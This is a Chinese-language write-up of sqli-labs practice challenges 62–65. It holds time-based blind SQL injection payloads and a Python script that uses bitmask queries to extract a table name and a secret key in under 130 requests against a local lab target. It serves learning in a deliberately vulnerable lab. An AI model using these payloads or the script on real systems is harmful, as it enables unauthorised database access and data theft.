sqli-labs(62-65)-challenges-盲注
62 130步內獲得flag-時間盲注
130步!有點太小瞧我了吧(歪嘴)
1.?id=2 and 1=2
顯示,不是數字型
2.?id=2'
不顯示
3.?id=2' and '1'='1
顯示1的查詢結果,說明有括號,且是單引號.
盲注:
-
表名是10個隨機字母加數字
-
欄位名是
secret_
+四個隨機字母或數字 -
密碼是24位隨機字母數字
最壞情況盲注次數是:(10+4+24)*34=1292
次,但是要130步內獲得,用burpsuite暴力猜解是不行了
可以手工二分法猜那麼最壞情況是:(10+4+24)*5=190
次
如果採用巢狀查詢,就不需要獲取表名,再使用二分法,那麼最壞次數為:(4+24)*5=140
手注
獲取表名
?id=1' and if(substr((select char_length(concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c))),1,1)='1', sleep(3),null)--+
或者使用下面的語句縮小範圍
?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)>'o', sleep(3),null)--
?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),2,1)>'m', sleep(3),null)--+
經過幾次嘗試就可以獲得表名
不猜表名,使用巢狀查詢
select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select group_concat(table_name) from information_schema.tables where table_schema=database());
指令碼
sqli-labs靶場Less-62題解(少於130次) - 簡書 (jianshu.com)
菜雞還不會寫指令碼,網上扒拉了一個
只能說大佬太強了,60多次就整出來了
#!/usr/bin/python3
# -*-coding:utf-8-*-
import re
import requests
url = "http://www.test.com/sqli-labs-master/Less-62/index.php" # 改成你的地址
try_count = 0
def extract_bits(query, i, bit_values: list):
"""
獲取query執行結果的第 i 個(從1開始算)字元的3個位元
哪3個位元由bit_values指定
"""
global try_count
assert len(bit_values) == 8
bit_marks = 0
for v in bit_values:
bit_marks |= v
payload = """
'+(
SELECT CASE ASCII(SUBSTRING(({query}), {i}, 1)) & ({bit_mark})
WHEN {0} THEN 1
WHEN {1} THEN 2
WHEN {2} THEN 3
WHEN {3} THEN 4
WHEN {4} THEN 5
WHEN {5} THEN 6
WHEN {6} THEN 7
ELSE 8
END
)+'
""".format(*bit_values[:7], query=query, bit_mark=bit_marks, i=i)
payload = re.sub(r'\s+', ' ', payload.strip().replace("\n", " "))
# print(payload)
resp = requests.get(url, params={"id": payload})
try_count += 1
infos = ["Angelina", "Dummy", "secure", "stupid", "superman", "batman", "admin", "admin1"]
match = re.search(r"Your Login name : (.*?)<br>", resp.text)
assert match
assert match.group(1) in infos
bits = bit_values[infos.index(match.group(1))]
return bits
def extract_data(query, length):
"""
獲取query查詢結果的length個字元,每個字元只獲取其第7位和前5位
"""
res = ""
for i in range(1, length+1):
b2 = extract_bits(query, i, [0b00000000, 0b00000001, 0b00000010, 0b00000011, 0b00000100, 0b00000101, 0b00000110, 0b00000111]) # 00000111
b1 = extract_bits(query, i, [0b00000000, 0b00001000, 0b00010000, 0b00011000, 0b01000000, 0b01001000, 0b01010000, 0b01011000]) # 01011000
if b1 & 0b01000000 == 0:
# 該字元為數字
bit = b1 | b2 | 0b00100000
else:
# 該字元為字母
bit = b1 | b2
res += chr(bit)
return res
if __name__ == "__main__":
table_name = extract_data("select table_name from information_schema.TABLES where TABLE_SCHEMA='challenges' limit 1", 10)
print("table_name:", table_name)
secret_key = extract_data("select c from (select 1 as a, 2 as b, 3 as c, 4 as d union select * from challenges.%s limit 1,1)x" % table_name, 24)
print("secret_key:", secret_key)
print("Done. try_count:", try_count)
63 130步之內-單引號-延時注入
id=2 and 1=2
顯示
id=2'
不顯示
id=2' and '1'='1
顯示2的查詢結果,單引號字元型
注入略過
64 130步之內-數字-雙括號
id=2 and 1=2
不顯示
id=2)--+
不顯示
id=2))--+
顯示,數字型,雙括號
注入略過
65 130步之內-雙引號-雙括號
id=2 and 1=2
顯示
id=2'
顯示
id=2"
不顯示
id=2" and "1"="1
顯示1的查詢結果,雙引號,雙括號
注入略過